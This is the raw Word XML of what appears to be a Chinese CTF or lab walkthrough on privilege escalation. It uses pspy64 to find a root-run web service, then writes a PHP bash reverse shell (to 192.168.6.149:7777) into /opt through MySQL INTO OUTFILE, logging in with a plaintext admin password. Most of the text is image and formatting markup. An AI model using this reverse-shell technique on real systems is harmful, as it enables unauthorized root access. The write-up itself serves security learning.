        <w:t>下载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psp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chmo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777 pspy64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pspy64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>赋予可执行权限。然后输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>./pspy64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行，查看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>UID0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>身份运行的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>UDI0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即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权限，且其网站根目录为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/opt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13EA4A2" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00AD069F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817DFA5" wp14:editId="72166CF6">
            <wp:extent cx="5274310" cy="1458595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="580181457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1457" name="图片 1" descr="电脑萤幕的截图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FBA" w14:textId="02FB0DBB" w:rsidR="00AD069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</w:p>
    <w:p w14:paraId="55F4D145" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00AD069F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40671589" wp14:editId="4BF2252B">
            <wp:extent cx="5274310" cy="1254760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="3545800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0061" name="图片 1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9DD" w14:textId="3C3642CE" w:rsidR="00AD069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</w:p>
    <w:p w14:paraId="74998F9E" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00AD069F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9B83DCF" wp14:editId="5BB5CE4A">
            <wp:extent cx="5274310" cy="1510030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14445634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63469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D5E" w14:textId="26DDA9E7" w:rsidR="00AD069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</w:p>
    <w:p w14:paraId="656D03D9" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00AD069F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6C89594" wp14:editId="683E3D9A">
            <wp:extent cx="5274310" cy="1667510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1618066998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6998" name="图片 1" descr="图形用户界面&#10;&#10;低可信度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E5CB" w14:textId="1C84F137" w:rsidR="00AD069F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</w:p>
    <w:p w14:paraId="68BF1B65" w14:textId="67C920A8" w:rsidR="00B5168E" w:rsidRDefault="00B5168E" w:rsidP="00AD069F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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/opt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下文件的权限，发现只有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用户是可写的。前文中发现数据库是拥有对任意文件位置的写权限的，如果数据库是以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身份运行的，那么就可以通过数据库向任意位置写入文件。同样是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pspy64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>工具中，可以看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UID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia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，即其确实是以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>身份运行的，攻击方法是可行的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CA6F9" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00B5168E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44265A0" wp14:editId="2D229CBF">
            <wp:extent cx="4829175" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="16395337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3769" name="图片 1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148" w14:textId="6A0CA763" w:rsidR="00B5168E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</w:p>
    <w:p w14:paraId="47E7AC2A" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00B5168E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3908EFDA" wp14:editId="427B2935">
            <wp:extent cx="5274310" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8719981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8113" name="图片 1" descr="文本&#10;&#10;中度可信度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35E" w14:textId="7E06DDC4" w:rsidR="00B5168E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</w:p>
    <w:p w14:paraId="493B6CC0" w14:textId="3E7173D6" w:rsidR="00142AD8" w:rsidRDefault="00142AD8" w:rsidP="00142AD8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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>身份登录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u admin -p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="001464F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HeLL0alI4ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后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mysql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中输入命令</w:t>
      </w:r>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>select '&lt;?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php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"bash -c \'bash -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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/192.168.6.149/7777 0&gt;&amp;1\'"); ?&gt;' into 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outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> '/opt/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bash_shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以写入反弹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然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>quit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>退出当前数据库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3C2A2BF" w14:textId="3FD71621" w:rsidR="00142AD8" w:rsidRDefault="00142AD8" w:rsidP="00142AD8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中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7777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data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shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中输入命令</w:t>
      </w:r>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>curl 127.0.0.1:8000/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00655957" w:rsidRPr="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bash_shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，成功获得</w:t>
      </w:r>
      <w:r w:rsidR="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00655957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92B693" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00142AD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D9515EC" wp14:editId="06B1A6E1">
            <wp:extent cx="5274310" cy="1691640"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="297085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554" name="图片 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C7E5" w14:textId="4E5D3941" w:rsidR="00142AD8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</w:p>
    <w:p w14:paraId="7A0693D5" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00655957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70BDB5A" wp14:editId="6873602A">
            <wp:extent cx="5274310" cy="712470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="178611984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9841" name="图片 1" descr="文本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9C34" w14:textId="73A94266" w:rsidR="00142AD8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</w:p>
    <w:p w14:paraId="310FD77A" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00142AD8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AC6141C" wp14:editId="3274C658">
            <wp:extent cx="3105150" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17416889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8999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33C7" w14:textId="426060F1" w:rsidR="00142AD8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</w:p>
    <w:p w14:paraId="11A4811E" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00655957" w:rsidP="00E95DF6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25D4D14" wp14:editId="0C902DDE">
            <wp:extent cx="5274310" cy="477520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12413389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38972" name="图片 1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A55A" w14:textId="55161B14" w:rsidR="00655957" w:rsidRDefault="00E95DF6" w:rsidP="00E95DF6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</w:p>
    <w:p w14:paraId="361B10AE" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00F310A2" w:rsidP="00E95DF6">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6052AC1B" wp14:editId="093AE3BF">
            <wp:extent cx="5274310" cy="1052195"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12562484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8488" name="图片 1" descr="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293" w14:textId="6F8DC7E3" w:rsidR="00F310A2" w:rsidRPr="00E95DF6" w:rsidRDefault="00E95DF6" w:rsidP="00E95DF6">
      <w:pPr>
        <w:pStyle w:val="ae"/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</w:p>
    <w:sectPr w:rsidR="00F310A2" w:rsidRPr="00E95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BDFCD" w14:textId="77777777" w:rsidR="00817F01" w:rsidRDefault="00817F01" w:rsidP="006D752A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="48033D80" w14:textId="77777777" w:rsidR="00817F01" w:rsidRDefault="00817F01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0FBCA" w14:textId="77777777" w:rsidR="00817F01" w:rsidRDefault="00817F01" w:rsidP="006D752A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C7C4DCB" w14:textId="77777777" w:rsidR="00817F01" w:rsidRDefault="00817F01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6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1888757876">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="272833435">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2044357876">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="837043859">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="832721892">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1833526483">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1929924622">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="173543929">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="369184006">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1716848754">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="473109691">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="244460023">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1099789700">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1626765405">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="62018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0CF1"/>
    <w:rsid w:val="00000E6B"/>
    <w:rsid w:val="00002BC0"/>
    <w:rsid w:val="000045FC"/>
    <w:rsid w:val="00007752"/>
    <w:rsid w:val="00012D2A"/>
    <w:rsid w:val="00012FEE"/>
    <w:rsid w:val="00013EEA"/>
    <w:rsid w:val="00013F58"/>
    <w:rsid w:val="00014931"/>
    <w:rsid w:val="000155E9"/>
    <w:rsid w:val="0001725F"/>
    <w:rsid w:val="00023F91"/>
    <w:rsid w:val="00024031"/>
    <w:rsid w:val="00024654"/>
    <w:rsid w:val="0002499F"/>
    <w:rsid w:val="000260F7"/>
    <w:rsid w:val="00027D03"/>
    <w:rsid w:val="000303FA"/>
    <w:rsid w:val="0003336C"/>
    <w:rsid w:val="0003461D"/>
    <w:rsid w:val="00036C5E"/>
    <w:rsid w:val="00040784"/>
    <w:rsid w:val="00041F99"/>
    <w:rsid w:val="000474A9"/>
    <w:rsid w:val="000523D2"/>
    <w:rsid w:val="00053502"/>
    <w:rsid w:val="000548E6"/>
    <w:rsid w:val="00054C99"/>
    <w:rsid w:val="00055559"/>
    <w:rsid w:val="000556C8"/>
    <w:rsid w:val="0005700D"/>
    <w:rsid w:val="00060CF2"/>
    <w:rsid w:val="00061BE7"/>
    <w:rsid w:val="00062BD2"/>
    <w:rsid w:val="00062E6A"/>
    <w:rsid w:val="000644B5"/>
    <w:rsid w:val="00071610"/>
    <w:rsid w:val="00073C8A"/>
    <w:rsid w:val="000826C4"/>
    <w:rsid w:val="00082F4B"/>
    <w:rsid w:val="00083C10"/>
    <w:rsid w:val="00084043"/>
    <w:rsid w:val="000902D3"/>
    <w:rsid w:val="00090E62"/>
    <w:rsid w:val="00091CD2"/>
    <w:rsid w:val="000969AA"/>
    <w:rsid w:val="00096EC8"/>
    <w:rsid w:val="000A0205"/>
    <w:rsid w:val="000A022B"/>
    <w:rsid w:val="000A12D7"/>
    <w:rsid w:val="000A13FB"/>
    <w:rsid w:val="000A3221"/>
    <w:rsid w:val="000B4321"/>
    <w:rsid w:val="000B675B"/>
    <w:rsid w:val="000C1321"/>
    <w:rsid w:val="000C35F6"/>
    <w:rsid w:val="000C71C7"/>
    <w:rsid w:val="000D046A"/>
    <w:rsid w:val="000D58F9"/>
    <w:rsid w:val="000D6428"/>
    <w:rsid w:val="000E09F0"/>
    <w:rsid w:val="000E744A"/>
    <w:rsid w:val="000F25D4"/>
    <w:rsid w:val="000F2F76"/>
    <w:rsid w:val="000F4A51"/>
    <w:rsid w:val="000F5868"/>
    <w:rsid w:val="000F6A92"/>
    <w:rsid w:val="0010319A"/>
    <w:rsid w:val="001043D1"/>
    <w:rsid w:val="00105878"/>
    <w:rsid w:val="0011110F"/>
    <w:rsid w:val="00111D1E"/>
    <w:rsid w:val="0011202F"/>
    <w:rsid w:val="00112411"/>
    <w:rsid w:val="00116212"/>
    <w:rsid w:val="00116752"/>
    <w:rsid w:val="00120BCB"/>
    <w:rsid w:val="001232AD"/>
    <w:rsid w:val="00133DAF"/>
    <w:rsid w:val="00134970"/>
    <w:rsid w:val="001363FF"/>
    <w:rsid w:val="0013691E"/>
    <w:rsid w:val="00136A8C"/>
    <w:rsid w:val="00142611"/>
    <w:rsid w:val="00142AD8"/>
    <w:rsid w:val="001440B9"/>
    <w:rsid w:val="001464F1"/>
    <w:rsid w:val="00152735"/>
    <w:rsid w:val="00154D5D"/>
    <w:rsid w:val="00160472"/>
    <w:rsid w:val="00161A87"/>
    <w:rsid w:val="001627C5"/>
    <w:rsid w:val="0016409B"/>
    <w:rsid w:val="00173A25"/>
    <w:rsid w:val="0017760F"/>
    <w:rsid w:val="001810B5"/>
    <w:rsid w:val="00183E70"/>
    <w:rsid w:val="00183E78"/>
    <w:rsid w:val="0018543C"/>
    <w:rsid w:val="0019093B"/>
    <w:rsid w:val="0019387A"/>
    <w:rsid w:val="001A7CF6"/>
    <w:rsid w:val="001B0FF8"/>
    <w:rsid w:val="001B1433"/>
    <w:rsid w:val="001B4FC1"/>
    <w:rsid w:val="001B62B7"/>
    <w:rsid w:val="001C2D52"/>
    <w:rsid w:val="001C373A"/>
    <w:rsid w:val="001C4619"/>
    <w:rsid w:val="001D01EE"/>
    <w:rsid w:val="001D295F"/>
    <w:rsid w:val="001D43DA"/>
    <w:rsid w:val="001E0FCC"/>
    <w:rsid w:val="001E6FAC"/>
    <w:rsid w:val="001E7710"/>
    <w:rsid w:val="001E7B8C"/>
    <w:rsid w:val="001F168A"/>
    <w:rsid w:val="001F2C89"/>
    <w:rsid w:val="001F4607"/>
    <w:rsid w:val="001F5A3A"/>
    <w:rsid w:val="00201C58"/>
    <w:rsid w:val="00204A1D"/>
    <w:rsid w:val="00206BBD"/>
    <w:rsid w:val="002072C5"/>
    <w:rsid w:val="0021257A"/>
    <w:rsid w:val="00214AAE"/>
    <w:rsid w:val="00215228"/>
    <w:rsid w:val="002175BD"/>
    <w:rsid w:val="00220DBE"/>
    <w:rsid w:val="002219CD"/>
    <w:rsid w:val="00221A13"/>
    <w:rsid w:val="00222A50"/>
    <w:rsid w:val="0022384B"/>
    <w:rsid w:val="00227B3B"/>
    <w:rsid w:val="0023276C"/>
    <w:rsid w:val="0023533B"/>
    <w:rsid w:val="0023703B"/>
    <w:rsid w:val="002401ED"/>
    <w:rsid w:val="0024245A"/>
    <w:rsid w:val="002477D0"/>
    <w:rsid w:val="00247E9E"/>
    <w:rsid w:val="00250335"/>
    <w:rsid w:val="002515A3"/>
    <w:rsid w:val="002579E0"/>
    <w:rsid w:val="00257B5B"/>
    <w:rsid w:val="00260279"/>
    <w:rsid w:val="002703BA"/>
    <w:rsid w:val="00270AAD"/>
    <w:rsid w:val="00270CCB"/>
    <w:rsid w:val="00270DAD"/>
    <w:rsid w:val="00274230"/>
    <w:rsid w:val="002774BE"/>
    <w:rsid w:val="00285170"/>
    <w:rsid w:val="00296051"/>
    <w:rsid w:val="00297137"/>
    <w:rsid w:val="002B04CA"/>
    <w:rsid w:val="002B2FEB"/>
    <w:rsid w:val="002B66FB"/>
    <w:rsid w:val="002C15C3"/>
    <w:rsid w:val="002C20A5"/>
    <w:rsid w:val="002C6542"/>
    <w:rsid w:val="002D0F04"/>
    <w:rsid w:val="002D161A"/>
    <w:rsid w:val="002D3385"/>
    <w:rsid w:val="002D4335"/>
    <w:rsid w:val="002D47D8"/>
    <w:rsid w:val="002D51A6"/>
    <w:rsid w:val="002D564C"/>
    <w:rsid w:val="002E61C2"/>
    <w:rsid w:val="002E6319"/>
    <w:rsid w:val="002E6D90"/>
    <w:rsid w:val="002E7182"/>
    <w:rsid w:val="002E7412"/>
    <w:rsid w:val="002F41DA"/>
    <w:rsid w:val="002F425D"/>
    <w:rsid w:val="002F6B3B"/>
    <w:rsid w:val="002F6F97"/>
    <w:rsid w:val="003007FE"/>
    <w:rsid w:val="003109D2"/>
    <w:rsid w:val="00311D85"/>
    <w:rsid w:val="00314023"/>
    <w:rsid w:val="00317F45"/>
    <w:rsid w:val="003206DD"/>
    <w:rsid w:val="00323E92"/>
    <w:rsid w:val="00325529"/>
    <w:rsid w:val="003264CC"/>
    <w:rsid w:val="00331613"/>
    <w:rsid w:val="0033221F"/>
    <w:rsid w:val="00334466"/>
    <w:rsid w:val="003352A5"/>
    <w:rsid w:val="00335F4F"/>
    <w:rsid w:val="00337474"/>
    <w:rsid w:val="00341A97"/>
    <w:rsid w:val="003452FB"/>
    <w:rsid w:val="00347361"/>
    <w:rsid w:val="00350DF6"/>
    <w:rsid w:val="00351A3D"/>
    <w:rsid w:val="00352C53"/>
    <w:rsid w:val="00354C64"/>
    <w:rsid w:val="00357C3F"/>
    <w:rsid w:val="00365BD3"/>
    <w:rsid w:val="00370290"/>
    <w:rsid w:val="00371BDD"/>
    <w:rsid w:val="00373375"/>
    <w:rsid w:val="003748CF"/>
    <w:rsid w:val="003826A5"/>
    <w:rsid w:val="0038424D"/>
    <w:rsid w:val="00386A75"/>
    <w:rsid w:val="00395701"/>
    <w:rsid w:val="00395902"/>
    <w:rsid w:val="003A3597"/>
    <w:rsid w:val="003A506F"/>
    <w:rsid w:val="003A55C0"/>
    <w:rsid w:val="003A6450"/>
    <w:rsid w:val="003B2CC8"/>
